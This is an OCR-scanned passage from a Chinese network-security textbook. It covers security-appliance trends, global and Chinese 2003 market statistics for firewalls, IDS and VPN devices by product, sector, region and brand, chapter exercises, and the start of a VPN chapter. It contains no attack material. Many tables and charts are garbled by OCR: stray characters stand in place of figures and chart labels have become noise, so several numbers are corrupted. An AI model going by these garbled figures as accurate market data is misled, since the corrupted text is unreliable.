中 小 规模 企业 的 数量 是 巨大 的 。 许 多 企业 已 经 瞄准 了 这 个 市 场 ,如 SonicWALL 和 
WatchGuard 已 经 部 署 了 广阔 的 渠道 ,并 且 拥 有 直接 针对 用 户 所 需 的 产品 。 除 此 之 外 ,其 他 
与 大 型 企业 联系 紧密 的 厂家 ,如 Cisco、JUNIPER、SYMANTEC 和 CheckPoint, 现 在 也 正在 
发 展 自己 的 产品 ,来 迎合 中 小 企业 用 户 。UTM 设备 厂家 , 像 FORTINET 和 ServGate, 也 
都 在 市 场 这 一 部 分 取得 了 成 功 。ServGate 与 Dell 开始 了 一 种 合作 : Dell 把 ServGate 
EdgeForce M30 推销 给 它 的 中 小 企业 用 户 。 潜 在 的 市 场 规模 为 所 有 厂家 在 未 来 创造 了 更 多 
的 机 会 。 


3. 安全 设备 形式 的 变革 


安全 设备 的 形式 将 继续 改变 。 独 立 的 黑 盒子 开始 被 刀片 式 或 卡 式 设 备 所 取代 。 
Cisco 和 CrossBeam 一 直 以 高 性 能 刀片 式 交换 机 而 著称 。14South 是 IBM 公司 的 一 款 产 
品 , 它 有 一 个 服务 器 安全 设备 卡 ,能 在 PCI 卡 上 提供 一 套 完整 设备 并 嵌入 服务 器 。 该 安 
全 设备 卡 能 提供 最 好 的 安全 软件 ,但 这 项 技术 最 早 是 由 一 款 基于 CheckPoint 的 防火 墙 提 
供 的 。CyberGuard 的 SnapGear 产品 线 有 两 款 基 于 PCI 的 防火 墙 。SMC Networks 有 一 款 
为 消费 市 场 设计 的 带 有 组 入 式 个 人 防火 墙 的 PCI 卡 。 将 来 还 会 出 现 更 多 具有 独特 形式 
的 产品 。 


4. 无 线 局 域 网 (WLAN) 的 安全 


为 了 减轻 使 用 WLAN 的 风险 ,各 企业 都 在 制定 针对 于 无 线 网 络 的 更 为 行 之 有 效 的 安 
全 解决 方案 。SonicWALL、WatchGuard、FORTINET、SYMANTEC 和 ZYXEL 全 都 有 内 
置 无 线 接 入 功能 的 安全 设备 。 这 项 技术 在 很 大 程度 上 减轻 了 WLAN 所 造成 的 相关 麻烦 ， 
并 且 将 为 所 有 安全 设备 提供 一 个 发 展 空间 。 


5. 防火 墙 路 由 器 


一 些 网 络 厂商 ,如 Cisco、.ENTERASYS 和 JUNIPER ,把 防火 墙 技术 加 入 路 由 器 ,这 种 
结合 将 对 UTM 安全 设备 市 场 形成 一 种 冲击 。 如 果 用 户 把 这 种 产品 和 专门 的 安全 产品 结合 
使 用 ,那么 这 将 为 所 有 厂商 提供 更 广阔 的 发 展 空间 。 但 是 这 些 产品 不 可 能 替代 独立 的 安全 
产品 ,尤其 是 UTM 平台 。 
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12.7 2003 年 全 球 网 络 安 全 设备 市 场 现 状 与 特点 


12.71 市 场 现状 


2003 年 全 球 网 络 市 场 出 现 复苏 迹象 ,从 2003 年 第 三 季度 开始 ,部 分 网 络 产 品 出 现 增长 
态势 。 网 络 安全 设备 在 2003 年 继续 成 为 市 场 的 亮点 ,并 全 年 保持 持续 增长 的 态势 。 

2003 年 全 球 全 网 性 安全 危机 的 此 起 彼 伏 是 网 络 安全 设备 保持 增长 的 根本 动力 ,而 一 些 
新 兴 市 场 的 快速 发 展 ,如 WLAN 市 场 ,也 带动 了 网 络 安全 设备 市 场 的 增长 。 从 2003 年 的 
全 球 市 场 环境 来 看 ,网 络 安全 危机 的 不 断 出 现 , 也 使 得 用 户 充分 意识 到 构建 网 络 安全 体系 的 
重要 性 ,这 也 直接 促进 了 网 络 安全 设备 市 场 的 增长 。 


12.72 市 场 特点 
1. 全 网 性 安全 危机 持续 爆发 ,网 络 安 全 已 经 成 为 社会 问题 


2003 年 的 "冲击波 ?病毒 一 夜 之 间 席 卷 全 球 网 络 , 再 次 暴露 出 网 络 危 机 ,同时 也 使 得 人 
们 开始 意识 到 ,网 络 安全 已 不 再 是 一 个 局 域 网 中 单纯 的 技术 问题 ,而 是 一 个 全 球 性 的 社会 问 
题 。 随 着 全 球 信息 交流 的 加 快 ,在 网 络 中 ,即使 一 个 局 域 网 是 相对 安全 的 ,但 是 一 旦 其 他 与 
之 交流 的 网 络 存在 安全 问题 ,那么 整个 网 络 的 信息 交换 依然 是 不 畅通 ,不 安全 的 ,这 也 使 得 
网 络 安全 成 为 一 个 全 球 性 的 社会 问题 。 网 络 安全 的 建设 不 再 仅仅 是 一 个 用 户 ,一 个 局 域 网 
的 问题 ,而 且 也 是 一 个 国家 及 全 球 协作 的 问题 。 


2. WLAN 市 场 的 高 速 增长 使 得 无 线 网 络 安全 问题 日 益 突出 


无 线 、 宽 带 是 网 络 市 场 发 展 的 两 个 主要 方向 ,而 WLAN 正 是 这 两 个 发 展 方向 的 最 好 解 
决 方案 ,但 是 WLAN 从 一 出 现 就 带 来 了 无 线 安全 问题 。 虽 然 2003 年 全 球 WLAN 市 场 高 速成 
长 ,但 是 无 线 网 络 安全 问题 也 日 益 突出 ,目前 还 没有 一 个 良好 的 解决 方案 能 够 解决 这 个 问题 ， 
其 主要 原因 在 于 技术 标准 尚未 形成 统一 , 现 有 技术 在 实施 过 程 中 的 可 操作 性 也 不 高 。 这 一 问 
题 在 未 来 的 市 场 发 展 中 还 将 一 直 存 在 ,而 这 也 为 众多 安全 厂商 提供 了 一 个 良好 的 潜力 市 场 。 


3. 用 户 的 网 络 管理 水 平 依然 困扰 网 络 安全 体系 的 运营 


管理 问题 一 直 是 困扰 用 户 网 络 安全 的 难题 ,从 目前 全 球 的 网 络 运营 情况 来 看 ,网 络 安全 
的 防护 依然 是 被 动 的 防护 ,大 多 数 用户 只 是 在 网 络 安全 危机 爆发 后 才 对 其 网 络 进行 维护 管 
理 。 这 一 点 在 冲击波” 的 病毒 爆发 危机 中 体现 得 最 为 明显 ,2003 年 7 月 Microsoft 公司 就 
公布 了 其 漏洞 补丁 ,而 众多 网 络 安全 厂商 也 一 直 提醒 用 户 注意 网 络 安全 ,但 是 最 终 还 是 爆发 
了 全 球 性 的 网 络 危 机 。 所 以 必须 提高 用 户 的 网 络 管理 水 平 。 


12.73 重点 国家 和 地 区 网 络 安全 设备 市 场 发 展 概述 
1. 欧美 市 场 继续 成 为 全 球 市 场 增长 的 主要 动力 
欧美 是 全 球 网 络 体系 中 比较 庞大 ,也 比较 完善 的 一 个 重要 组 成 部 分 ,在 网 络 危机 的 冲击 
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下 ,欧美 网 络 体系 受 影响 的 程度 最 大 ,所 以 其 在 网 络 安全 设备 方面 的 投资 也 是 全 球 最 高 的 区 域 。 
2. 日 本 市 场 增长 逐步 稳定 
日 本 的 网 络 构建 也 是 全 球体 系 中 比较 完善 的 。 日 本 对 于 网 络 安全 的 重视 程度 也 非常 
高 ,在 2003 年 的 全 球 网 络 安全 设备 市 场 中 ,日 本 市 场 进入 平稳 增长 期 ,其 增长 逐步 稳定 。 
3. 亚太 市 场 热 点 区 域 和 热点 产品 突出 (不 包括 日 本 ) 
在 亚太 地 区 ,东南 亚 的 一 些 国家 进入 网 络 建设 的 高 峰 期 。 这 些 国家 吸取 了 现 有 全 球 网 


络 体系 中 的 一 些 经 验 和 教训 ,加 大 了 网 络 安全 设备 的 投资 ,尤其 是 防火 墙 \ VPN 和 IDS 等 网 
络 安全 设备 成 为 投资 重点 。 


12.8 2003 年 中 国 网 络 安全 设备 市 场 规模 与 结构 


12.8.1 市 场 规模 与 增长 
1. 总 量规 模 


2003 年 中 国 网 络 安全 设备 市 场 的 规模 达到 10. 6 亿 元 , 比 2002 年 增长 了 53.6% ,继续 
保持 高 速 增长 。 

从 1999 一 2003 年 的 中 国 网 络 安全 设备 市 场 的 发 展 来 看 ,网 络 安全 设备 市 场 保持 了 较 高 
的 增长 速度 ,从 1999 年 的 1.5 亿 元 发 展 到 2003 年 的 10. 6 亿 元 ,市 场 规模 扩大 了 7.07 售 ， 
年 复合 增长 率 为 63.0%。2002 年 是 增长 的 高 峰 期 ,增长 率 达 到 86. 5%。1999 一 2003 年 中 
国 网 络 安全 设备 市 场 增长 状况 如 表 12.2 所 示 。1999 一 2003 年 中 国 网 络 安 全 设备 市 场 规模 
及 增长 率 情况 如 图 12. 2 所 示 。 


表 12.2 1999 一 2003 年 中 国 网 络 安全 设备 市 场 增长 状况 


年 度 1999 年 2000 年 2001 年 2002 年 2003 年 1999 一 2003 
市 场 规模 ( 亿 元 ) i 2.3 6.9 10.6 25.0 
增长 率 2 53.3% 60.9% 86.5% 53.6% 63.0% 
oy 
12.0 06 100.0% 
100[ Se -| 80.0% 
S00 53.3% C09% 69 J 60.0% 
6.0 上 
53.6% 
-1 40.0% 
4.0 上 EE 
20 .1s 23 4 20.0% 
0.0 0.0% 
1999 年 2000 年 2001 年 2002 年 2003 年 
市 场 规模 ( 亿 元 ) 1.5 23 3.7 6.9 10.6 
一 * 一 市 场 增长 率 53.3% 60.9% 86.5% 53.6% 


图 12.2 1999 一 2003 年 中 国 网 络 安 全 设备 市 场 规模 及 增长 率 情况 
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2. 增长 速度 分 析 


在 2003 年 的 中 国 网 络 设备 市 场 中 ,网 络 安全 设备 和 宽带 设备 成 为 两 个 最 大 的 亮点 ,而 
网 络 安 全 设备 市 场 的 高 速 增长 主要 有 以 下 几 个 方面 的 原因 。 

(1) 网 络 安全 危机 频频 爆发 使 用 户 对 网 络 安全 的 重视 程度 提高 

2002 年 网 络 安全 危机 的 阴影 尚未 过 去 ,2003 年 的 冲击波” 病毒 又 一 次 让 人 们 体会 到 了 
网 络 的 脆弱 性 。 面 对 日 益 增 长 的 信息 价值 ,以 及 现 有 的 脆弱 的 网 络 安全 防护 ,用 户 对 于 网 络 
的 重视 程度 正在 不 断 提高 ,这 是 网 络 安全 设备 市 场 持续 增长 的 根本 原因 。 

(2) 厂商 的 宣传 活动 促进 用 户 网 络 安全 意识 的 提升 

网 络 安 全 已 经 成 为 网 络 市 场 的 一 大 热点 ,众多 厂商 为 了 竞争 ,纷纷 加 强 自身 的 广告 宣传 
以 及 市 场 活 动 , 而 这 些 宣传 活动 在 为 厂商 获取 一 定 回 报 的 同时 ,也 促进 了 用 户 网 络 安全 意识 
的 提升 。 

(3) 网 络 信息 快速 增值 ,其 价值 逐步 被 用 户 认可 

随 着 目前 网 络 的 发 展 ,尤其 是 2003 年 在 经 历 了 SARS 之 后 ,许多 公司 及 个 人 都 已 经 认 
识 到 网 络 的 优势 ,对 于 网 络 的 信赖 程度 也 正在 逐步 提高 ,而 网 络 信息 也 处 于 一 个 快速 增值 
期 。 当 网 络 信息 的 价值 逐步 被 用 户 认可 之 后 ,保证 这 些 信息 的 价值 也 成 为 用 户 加 大 网 络 安 
全 设备 投资 的 一 个 主要 因素 。 

(4) 行业 信息 化 进程 加 速 网 络 安全 设备 的 增长 

目前 中 国 处 于 行业 信息 化 建设 的 高 峰 期 。 在 中 国政 府 主推 的 “12 金工 程 ” 中 ,更 是 将 网 
络 安全 放 在 了 首位 。 

这 些 因素 都 极 大 地 促进 了 中 国 网 络 安 全 设备 市 场 的 发 展 。 


1282 产品 结构 


1. 产品 结构 分 布 


在 2003 年 中 国 网 络 安 全 设备 市 场 中 ,防火 墙 设备 依然 是 市 场 的 主要 产品 , 占 总 体 市 场 
规模 的 69. 8%; 入 侵 检测 设备 市 场 占 总 体 市 场 规模 的 17. 9%; VPN 设备 市 场 占 总 体 市 场 
规模 的 12. 3%。2003 年 中 国 网 络 安 全 设备 产品 结构 分 布 如 表 12. 3 所 示 。2003 年 中 国 网 
络 安 全 设备 产品 结构 分 布 如 图 12. 3 所 示 。 


表 12.3 2003 年 中 国 网 络 安全 设备 产品 结构 分 布 


产品 结构 名 称 防火 墙 入 侵 检 测 VPN 总 计 
市 场 规模 ( 亿 元 ) 7.4 1.9 生肖 10.6 
市 场 份额 69.8% 17.9% 12.3% 100.0% 
入 侵 检 测 
17.9% 
VPN 2% > 


防火 墙 69.8% 
图 12.3 2003 年 中 国 网 络 安全 设备 产品 结构 分 布 
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2. 产品 结构 变化 情况 分 析 


对 比 1999 一 2003 年 中 国 网 络 安全 设备 市 场 中 的 产品 结构 变化 情况 ,可 以 看 出 : 防火 墙 
设备 的 市 场 份额 一 直 保持 在 一 个 较为 稳定 的 范围 内 ; 而 VPN 设备 虽然 较 早 就 进入 市 场 ,但 
是 一 直 尚 未 真正 启动 ,所 以 其 市 场 份 额 在 1999 一 2002 年 期 间 持 续 下 降 ,在 2003 年 ,因为 市 
场 对 其 重视 程度 的 提高 及 应 用 的 快速 普及 ,其 市 场 份 额 迅 速 增 大 , 占 2003 年 总 体 市 场 规模 
的 12.3%; 入 侵 监测 设备 在 1999 一 2002 年 期 间 的 市 场 份额 也 较为 稳定 ,但 是 在 2003 年 因 
受 SARS 的 影响 ,部 分 国外 厂商 的 市 场 状 况 出 现 一 定 的 下 滑 , 所 以 其 在 总 体 市 场 中 的 份额 
也 出 现 急速 下 降 。1999 一 2003 年 网 络 安全 设备 产品 结构 变化 如 表 12. 4 所 示 。1999 一 2003 
年 网 络 安全 设备 产品 结构 变化 如 图 12.4 所 示 。 


表 12.4 1999 一 2003 年 网 络 安全 设备 产品 结构 变化 表 


1999 年 2000 年 2001 年 2002 年 2003 年 
防火 墙 66.7% 65.2% 67.6% 69.6% 69.8% 
VPN 13.3% 13.0% 10.8% 10.1% 12.3% 
入 侵 检 测 20.0% 21.7% 21.6% 20.3% 17.9% 
100% 
80% [| [B39% 13.0%| 10 101 12.3% 
60% 上 
40% | 667% 65.2%| 67.6%| 69.6%| 69.8% 
20% 上 
0% 
1999 年 2000 年 2001 年 2002 年 2003 年 
晶 入 侵 检测 20.0% 21.7% 21.6% 20.3% 17.9% 
日 VPN 13.3% 13.0% 10.8% 10.1% 12.3% 
口 防火 墙 66.7% 65.2% 67.6% 69.6% 69.8% 


图 12.4 1999 一 2003 年 网 络 安全 设备 产品 结构 变化 图 


12.83 市 场 结 构 
1. 垂直 市 场 结构 


在 垂直 市 场 方面 ,大 型 企业 市 场 依然 是 整个 市 场 的 主体 ,其 市 场 规模 占 总 体 市 场 规模 的 
48.1%; 政府 市 场 位 居 第 二 , 占 总 体 市 场 规模 的 21.7%; 中 小 型 企业 市 场 和 教育 市 场 分 别 
占 总 体 市 场 规模 的 19. 8% 和 10.4%; 家 庭 -个 人 市 场 基本 没有 市 场 份额 。 

垂直 市 场 的 市 场 规模 分 布 在 一 定 程度 上 代表 了 网 络 安全 设备 市 场 的 成 熟 度 。 大 型 企业 
市 场 是 中 国 网 络 的 核心 资源 市 场 , 所 以 其 资源 价值 最 高 ,资源 价值 的 认可 度 也 最 高 ,在 网 络 
安全 设备 市 场 方面 的 支出 最 大 ; 政府 市 场 因为 涉及 国家 安全 ,外 加 2003 年 电子 政务 的 广泛 
展开 ,在 市 场 规模 中 也 占据 了 相当 的 份额 ; 中 小 型 企业 市 场 和 教育 市 场 因为 都 还 处 于 起 步 
阶段 ,对 其 资源 的 认可 度 普遍 不 高 ,所 以 它们 市 场 份额 都 不 大 ; 家 庭 -个 人 市 场 是 网 络 安全 
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设备 的 非 目标 市 场 ,所 以 没有 市 场 份额 。2003 年 网 络 安全 设备 垂直 市 场 分 布 如 表 12. 5 所 
示 。2003 年 网 络 安全 设备 垂直 市 场 分 布 如 图 12. 5 所 示 。 


表 12.5 2003 年 网 络 安全 设备 垂直 市 场 分 布 


垂直 市 场 名 称 大 型 企业 市 场 ”中 小 型 企业 市 场 ”政府 市 场 ” 教育 市 场 总 计 
市 场 规模 ( 亿 元 ) 5.1 | 2 到 10.6 
市 场 份额 48.1% 19.8% 21.7% 10.4% 100.0% 

教育 市 场 


10.4% 


政府 市 场 
21.7% 大 型 企业 市 场 
48.1% 


中 小 型 企业 市 场 
19.8% 


12.5 2003 年 网 络 安全 设备 垂直 市 场 分 布 


对 比 2002 一 2003 年 中 国 网 络 安全 设备 在 垂直 市 场 中 的 结构 情况 ,可 以 看 出 : 2003 年 中 
小 型 企业 市 场 增长 非常 迅速 ,其 增长 率 在 垂直 市 场 结构 中 是 最 高 的 ,达到 75.0%; 政府 市 场 
和 教育 市 场 的 增长 也 较 快 ,其 增长 率 分 别 为 64.3% 和 57.1%; 大 型 企业 市 场 因 为 市 场 相当 
成 熟 和 完善 ,所 以 增长 相对 平稳 ,其 增长 率 为 41.7%。2002 一 2003 年 网 络 安全 设备 垂直 市 
场 变化 情况 如 表 12.6 所 示 。2002 一 2003 年 网 络 安全 设备 垂直 市 场 变 化 如 图 12.6 所 示 。 


表 12.6 2002 一 2003 年 网 络 安全 设备 垂直 市 场 变化 情况 
2002 年 市 场 规模 。 2002 年 。 2003 年 市 场 规模 2003 年 


( 亿 元 ) 市 场 份额 ( 亿 元 ) 市 场 份 额 le 
大 型 企业 市 场 3.6 52.2% | 48.1% 41.7% 
中 小 型 企业 市 场 到 学 17.4% 2.1 19.8% 75.0% 
政府 市 场 1.4 20.3% 2.3 21.7% 64.3% 
教育 市 场 分 10.1% 二 和 10.4% 57.1% 
总 计 6.9 100.0% 10.6 100.0% 53.6% 


2. 行业 市 场 结构 


在 2003 年 网 络 安全 设备 行业 市 场 中 .电信 ,金融 、 政 府 依然 是 行业 市 场 中 的 重点 ,其 
市 场 规模 分 别 为 2. 5 亿 元 、2.7 亿 元 、2.3 亿 元 ,分 别 占 总 体 市 场 规模 的 23. 6% 、25.5%、 
21.7%; 教育 能源、 交通 的 市 场 规模 分 别 为 1. 1 亿 元 .0.6 亿 元 .0.3 亿 元 ,分 别 占 总 体 市 场 
规模 的 10. 4%、5.7% 、2.8%; 其 他 行业 市 场 的 市 场 规模 为 1. 1 亿 元 , 占 总 体 市 场 规模 的 
10.4%。2003 年 网 络 安全 设备 行业 市 场 分 布 如 表 12. 7 所 示 。2003 年 网 络 安全 设备 行业 市 
场 分 布 如 图 12. 7 所 示 。 
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100% T0406 
830% 20.3% 
G0% | 
40% 
20%| 
0% 
2002 年 市 场 份额 2003 年 市 场 份额 
晶 教育 市 场 10.1% 10.4% 
9 政府 市 场 20.3% 21.7% 
o 中 小 型 企业 市 场 17.4% 19.8% 
日 大 型 企业 市 场 52.2% 48.1% 
12.6 2002 一 2003 年 网 络 安全 设备 垂直 市 场 分 布 
表 12.7 2003 年 网 络 安全 设备 行业 市 场 分 布 
行业 市 场 名 称 市 场 规模 ( 亿 元 ) 市 场 份 额 
电信 255 23.6% 
金融 2 25.5% 
政府 只 21.7% 
教育 1.1 10.4% 
能 源 0.6 5.7% 
交通 0.3 2.8% 
其 他 i 10.4% 
总 计 10.6 100.0% 
其 他 
交通 10.4% 电信 
能 源 2.8% 


对 比 2002 年 网 络 安全 设备 行业 市 场 ,可 以 看 出 ,在 2003 年 网 络 安全 设备 行业 市 场 中 ， 
能 源 行业 的 增长 速度 非常 快 ,增长 率 达 到 100.0%% ,其 主要 是 因为 能 源 行业 在 信息 化 建设 方 
面 的 速度 加 快 ,同时 能 源 行业 的 基数 非常 小 ,也 成 就 了 高 速度 的 增长 率 ; 政府 和 教育 行业 的 
增长 速度 也 非常 快 ,其 增长 率 分 别 为 64. 3%、57.1%; 电信 和 金融 行业 依然 是 主要 的 市 场 ， 
但 是 因为 市 场 已 经 相对 成 熟 , 而 且 市 场 规模 也 较 大 ,所 以 其 增长 率 并 不 太 高 ,分 别 为 47. 1% 
和 50.0%; 交通 和 其 他 行业 市 场 的 增长 率 分 别 为 50.0% 和 37. 5%。2002 一 2003 年 网 络 安 
全 设备 行业 市 场 变 化 情况 如 表 12. 8 所 示 。2002 一 2003 年 网 络 安 全 设备 行业 市 场 变化 情况 


如 图 12. 8 所 示 。 


5.7% 


re 


CE 


金融 
25.5% 
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表 12.8 2002 一 2003 年 网 络 安全 设备 行业 市 场 变化 情况 
行业 市 场 ” 2002 年 市 场 规模 。 “2002 年 市 场 2003 年 市 场 规模 ”2003 年 市 场 


名 称 〈 亿 元 ) 份额 〈 亿 元 ) 份额 a 
电信 Wy 24.6% 2:5 23.6% 47.1% 
金融 1.8 26.1% 2 25.5% 50.0% 
政府 1.4 20.3% 区 3 21.7% 64.3% 
教育 0.7 10.1% El 10.4% 57,1% 
能 源 0.3 4.3% 0.6 5.7% 100.0% 
交通 0.2 2.9% 0.3 2.8% 50.0% 
其 他 0.8 11.6% 1.1 10.4% 37.5% 
总 计 6.9 100.0% 10.6 100.0% 53.6% 


2002 年 市 场 份额 2002 年 市 场 份额 


里 电信 自 金 融 昌 政府 日 教育 日 能 源 日 交通 日 其 他 


图 12.8 2002 一 2003 年 网 络 安全 设备 行业 市 场 变化 情况 


3. 区 域 市 场 结构 


2003 年 网 络 安全 设备 的 区 域 市 场 中 ,华北 、 华 东 、 华 南 区 域 依然 是 前 三 名 ,市 场 规模 分 
别 为 2.9 亿 元 、3.0 亿 元 .2.2 亿 元 , 占 总 体 市 场 份额 的 27.4% 、28.3%、20.8%; 华中 ,东北 、 
西南 处 于 第 二 梯队 ,市场 规模 分 别 为 0. 8 亿 元 .0.7 亿 元 .0.6 亿 元 , 占 总 体 市 场 份额 的 
7.5%、6.6%、5.7%; 西北 市 场 还 处 于 发 展 初期 ,其 市 场 规模 为 0. 4 亿 元 , 占 总 体 市 场 规模 
的 3.8%。2003 年 网 络 安全 设备 区 域 市 场 分 布 如 表 12. 9 所 示 。2003 年 网 络 安全 设备 区 域 
市 场 分 布 如 图 12. 9 所 示 。 


表 12.9 2003 年 网 络 安全 设备 区 域 市 场 分 布 


区 域 市 场 名 称 市 场 规模 ( 亿 元 ) 市 场 份额 
华北 2.9 27.4% 
华东 3.0 28.3% 
华南 F 20.8% 
华中 0.8 7.5% 
东北 0.7 6.6% 
西北 0.4 3.8% 
西南 0.6 5.7% 


总 计 10.6 100.0% 
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西南 5.7% 
西北 3.8% 
东北 6.6% 华北 27.4% 
华中 wo 
华南 lz 


华东 28.3% 
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对 比 2002 年 网 络 安 全 设备 区 域 市 场 ,2003 年 网 络 安 全 设备 区 域 市 场 中 ,西北 地 区 市 场 
规模 增长 迅速 ,增长 率 为 100.0%; 第 二 梯队 中 ,华中 、 东 北 、 西 南 地 区 的 总 体 增长 都 较 高 , 增 
长 率 分 别 为 60.0%、75.0%、50.0%; 第 一 梯队 中 ,华东 市 场 增长 最 为 突出 ,其 增长 率 维持 在 
一 个 较 高 的 水 平 ,为 57.9%; 第 一 梯队 中 的 华北 和 华南 市 场 相 比 前 几 个 区 域 市 场 ,增长 率 要 
略 低 一 些 , 分 别 为 45.0 外 和 46. 7%。2002 一 2003 年 网 络 安全 设备 区 域 市 场 变化 情况 如 表 
12. 10 所 示 。2002 一 2003 年 网 络 安全 设备 区 域 市 场 变化 情况 如 图 12. 10 所 示 。 


表 12. 10 2002 一 2003 年 网 络 安全 设备 区 域 市 场 变化 情况 
区 域 市 场 ”2002 年 市 场 规模 ”2002 年 市 场 2003 年 市 场 规模 2003 年 市 场 


名 称 〈 亿 元 ) 份额 ( 亿 元 ) 份额 
华北 2.0 29.0% 2.9 27.4% 45.0% 
华东 1.9 27.5% 3.0 28.3% 57.9% 
华南 到 21.7% 2 20.8% 46.7% 
华中 0,5 7.2% 0.8 7.5% 60.0% 
东北 0.4 5.8% 0.7 6.6% 75.0% 
西北 0.2 2.9% 0.4 3.8% 100.0% 
西南 0.4 5.8% 0.6 5.7% 50.0% 
总 计 6.9 100.0% 10.6 100.0% 53.6% 


20% 


2002 年 市 场 规模 2003 年 市 场 规模 


是 华北 华东 曙 华 南 旬 华中 日 东北 日 西 北口 西南 


图 12.10 2002 一 2003 年 网 络 安全 设备 区 域 市 场 变化 情况 
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4. 品牌 市 场 结构 


2003 年 网 络 安全 设备 品牌 市 场 中 : 国外 厂商 依然 占据 市 场 的 前 两 位 , Cisco 和 
NetScreen 的 市 场 规模 分 别 为 1. 3 亿 元 、1.1 亿 元 , 占 总 体 市 场 规模 的 12. 3% 和 10. 4%; 
2003 年 国内 厂商 增长 速度 非常 快 ,东软 .天 融 信 、 联 想 位 居 国 内 厂商 品牌 的 前 三 名 ,市 场 规 
模 分 布 为 1. 0 亿 元 .0.9 亿 元 .0.6 亿 元 ,分 别 占 总 体 市 场 规模 的 9.4%、8.5%、5.7%; 目前 
市 场 中 参与 竞争 的 厂商 非常 多 ,竞争 非常 激烈 ,其 他 品牌 的 市 场 规模 为 4.1 亿 元 , 占 总 体 市 
场 规模 的 38.7%。2003 年 网 络 安全 设备 品牌 市 场 分 布 如 表 12. 11 所 示 。2003 年 网 络 安全 
设备 品牌 市 场 分 布 如 图 12. 11 所 示 。 


表 12.11 2003 年 网 络 安全 设备 品牌 市 场 分 布 


品牌 名 称 市 场 规模 ( 亿 元 ) 市 场 份额 
Cisco LS 12.3% 
NetScreen he 10.4% 
东软 1.0 9.4% 
天 融 信 0.9 8.5% 
联想 0.6 5.7% 
安 氏 0.6 5.7% 
启明 星 展 0.5 4.7% 
中 科 网 威 0.5 4.7% 
其 他 4.1 38.7% 
总 计 10.6 100.0% 
思科 12.3% 


其 他 38.7% Dp 10.4% 
SUjnw 9.4% 
中 科 网 威 BM/| NN 8.5% 


启明 星 展 4.7% 联想 5.7% 
安 氏 5.7% 


12.11 2003 年 网 络 安全 设备 品牌 市 场 分 布 


12.84 市 场 特征 
1. 国家 开始 注重 政策 引导 


随 着 中 国 网 络 化 进程 的 逐步 深入 ,网 络 安全 涉及 国家 安全 的 内 容 也 越 来 越 多 ,所 以 国家 
政策 的 影响 也 开始 在 网 络 安全 的 发 展 中 体现 出 来 。2003 年 ,中 国政 府 对 网 络 安全 市 场 最 大 
的 政策 影响 无 疑 是 颁布 了 中 国 自己 的 WLAN 安全 标准 ,并 于 2003 年 12 月 1 日 起 开始 强制 
执行 ,这 也 说 明 全 球 信息 一 体 化 与 国家 安全 矛盾 日 益 突出 的 今天 ,中 国政 府 已 经 开始 注重 政 
策 对 网 络 安全 市 场 的 引导 作用 。 
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2. 网 络 安全 设备 成 为 用 户 采 购 单 中 的 重要 组 成 部 分 


2003 年 ,网 络 用户 在 网 络 安全 设备 方面 的 支出 大 大 增加 ,网 络 安全 设备 已 经 成 为 用 户 
网 络 设备 采购 单 中 的 重要 组 成 部 分 。 


3. 传统 网 络 设备 厂商 纷纷 进入 市 场 ,市场 开始 新 一 轮 排序 


华为 公司 在 2003 年 推出 了 自己 的 独立 网 络 安全 设备 产品 ,再 加 上 思科 在 2002 年 11 月 
以 1200 万 美元 收购 了 从 事 网 络 安全 软件 开发 的 PSIONIC 公司 ,传统 网 络 设 备 厂 商 已 经 不 
再 局 限于 传统 的 以 太 网 交换 机 、 路 由 器 市 场 , 网 络 安全 设备 市 场 已 经 成 为 他 们 新 的 市 场 目 
标 。 面 对 传统 网 络 设备 厂商 的 进入 , 原 有 的 网 络 安全 设备 厂商 必 将 与 之 针锋相对 ,市 场 也 开 
始 新 一 轮 的 排序 。 


4. 电信 市 场 , 行 业 市 场 齐头并进 


2003 年 电信 市 场 对 于 网 络 安全 设备 的 采购 保持 平稳 增长 态势 ; 行业 市 场 成 为 市 场 的 
主角 ,进入 高 速 增长 期 。 电 信 市 场 与 行业 市 场 在 2003 年 的 网 络 安全 设备 市 场 中 齐头并进 。 


5. 整体 解决 方案 需求 旺盛 ,单一 设备 供给 将 逐步 被 淘汰 


随 着 网 络 安全 危机 的 层出不穷 ,以 及 网 络 架 构 的 日 趋 复杂 ,单一 性 的 产品 已 经 远 远 不 能 
满足 用 户 的 需求 。 在 2003 年 的 网 络 安全 市 场 中 ,整体 解决 方案 已 经 成 为 市 场 的 突出 需求 。 


习题 


. 什么 是 防火 墙 7 防火 墙 按照 对 内 外 来 往 数 据 的 处 理 方法 可 以 分 为 哪 两 类 ? 
. 包 过 滤 防 火 墙 包括 哪 两 种 过 滤 方 式 ? 

.防火 墙 按照 网 络 体系 结构 可 以 分 为 哪 几 类 ? 

. 分 布 式 防火 墙 主要 包括 哪 几 部 分 ? 

. 防水 墙 系统 由 哪 几 部 分 组 成 ? 

.【 思 考题 ] 如 何在 网 络 中 高 效 部 署 防火 墙 , 使 其 发 挥 更 充分 的 作用 ? 
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CHAPTERB 


虚拟 专用 网 络 技术 第 13 章 


VPN 全 称 是 Virtual Private Network, 即 虚拟 专用 网 络 。 它 为 两 个 或 多 
个 用 户 在 公 网 上 进行 数据 传输 提供 了 安全 保障 。 现 在 越 来 越 多 的 政府 部 门 
和 企业 在 办 公 网 络 中 使 用 了 VPN 技术 。 

本 章 要 点 如 下 : 

。 VPN 技术 简介 ; 

。 VPN 隧道 技术 ; 

。 VPN 组 网 技术 ; 

。 在 路 由 器 上 配置 VPN; 

。 VPN 软件 介绍 。 


13.1 VPN 技术 简介 


随 着 Internet 的 发 展 和 电子 商务 的 日 趋 成 熟 ,政府 机 关 和 企 事业 单位 更 
倾向 于 利用 网 络 来 完成 原 有 的 数据 传输 业务 。 

例如 ,北京 市 税务 局 就 需要 将 地 税 部 门 的 网 络 接 人 总 部 的 网 络 ,上 传 税 
务 报表 。 商 业 业务 多 种 多 样 的 中 小 企业 ,更 是 需要 生意 伙伴 、 供 应 商 、 客 户 能 
够 随时 访问 自己 的 内 部 网 络 。 但 是 带 来 的 问题 是 ,架设 独立 的 网 络 ,可 能 需 
要 覆盖 一 个 城市 或 者 全 国 , 相 应 的 成 本 太 高 ,而 利用 已 有 的 公 网 环境 ,又 会 有 
信息 安全 隐患 。 

人 们 需要 能 够 防御 非法 入 侵 者 的 网 络 ,需要 进行 相关 业务 的 身份 认证 ， 
需要 信息 的 机 密 性 和 完整 性 ,需要 网 上 交易 的 不 可 抵赖 性 ,需要 业务 数据 的 
安全 存储 性 ,需要 个 人 用 户 及 合作 伙伴 随时 接 入 和 断 开 的 易 操作 性 等 需求 促 
进 了 VPN 技术 的 发 展 。 同 样 上 面 这 些 需 求 也 成 为 当今 VPN 技术 的 核心 
特征 。 

